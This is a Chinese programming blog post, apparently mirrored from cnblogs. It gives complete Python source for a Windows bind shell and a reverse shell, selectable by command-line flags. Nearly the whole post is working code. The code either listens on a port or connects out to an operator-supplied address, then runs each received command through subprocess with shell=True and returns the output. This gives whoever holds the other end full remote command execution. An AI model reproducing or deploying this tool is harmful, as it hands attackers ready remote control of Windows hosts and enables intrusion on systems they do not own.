zoukankan html css js c++ java

Windows正向绑定shell和反向反弹shell的Python代码

Windows下的shell原理

经过查阅资料，使用os.dup2(nfd, ofd)的方式重定向socket的输入输出到windows系统的cmd是无法做到的，属于系统原因，不能直接复制Linux下的方案，所以只能写程序收集socket的输入，调用subprocess.Popen去执行，然后获取输出后在返回给socket。

Python源代码

# -*- coding:utf-8 -*-


# 引入依赖的库、包、模块
import os
import select
import socket
import subprocess
from optparse import OptionParser


# 定义shell函数
def BindConnect(addr, port):
    '''正向连接shell'''
    try:
        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell.bind((addr,port))
        shell.listen(1)
    except Exception as reason:
        print ('[-] Failed to Create Socket : %s'%reason)
        exit(0)
    client, addr = shell.accept()
    rlist = [shell, client]
    wlist = []
    elist = [shell, client]
    while True:
        client.send("bobac's-shell#")
        rs,ws,es = select.select(rlist,wlist,wlist)
        for sockfd in rs:
            if sockfd == client:
                command = client.recv(1024)
                if command == 'exit':
                    shell.close()
                    client.close()
                    break
                result, error = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
                client.sendall(result.decode("GB2312").encode("UTF-8"))


def ReserveConnect(addr, port):
    '''反弹连接shell'''
    try:
        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell.connect((addr,port))
    except Exception as reason:
        print ('[-] Failed to Create Socket : %s'%reason)
        exit(0)
    rlist = [shell]
    wlist = []
    elist = [shell]
    while True:
        shell.send("bobac's-shell#")
        rs,ws,es = select.select(rlist,wlist,wlist)
        for sockfd in rs:
            if sockfd == shell:
                command = shell.recv(1024)
                if command == 'exit':
                    shell.close()
                    break
                result, error = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
                shell.sendall(result.decode("GB2312").encode("UTF-8"))


# 主函数运行
if __name__ == "__main__":
    optParser = OptionParser()
    optParser.add_option('-r','--reverse', action='store_true', dest='reverse')
    optParser.add_option('-b','--bind', action='store_true', dest='bind')
    optParser.add_option("-a","--addr", dest="addr")
    optParser.add_option("-p","--port", dest="port")
    options , args = optParser.parse_args()
    if options.reverse:
        ReserveConnect(options.addr, int(options.port))
    elif options.bind:
        BindConnect(options.addr, int(options.port))

运行效果如图

查看全文

相关阅读:
[笔记] Duke
foxmail配置office365邮箱
 bootstrap-select and selectpicker 修改下拉框的宽度或者下方留白
 项目技术沉淀0
alibaba开发手册
 关于fastjson
org.springframework.jdbc.UncategorizedSQLException: ### Error updating database. Cause: java.sql.SQLException: Incorrect string value: 'xE2x80x8BxE2x80x8B...' for column 'pro_backgroud' at row
datatable某列不排序、和自定义搜索、给数据里面加属性
 19.10.30笔记-文件下载
 没有图片的freemarker下载，备份

原文地址：https://www.cnblogs.com/KevinGeorge/p/9780151.html

最新文章
士兵站队问题
 约瑟夫问题
 定义变量类型，正则匹配
 配置数据库，Flask-Alchemy
flask
爬虫基础
 urllib
urllib2
request
基本文件操作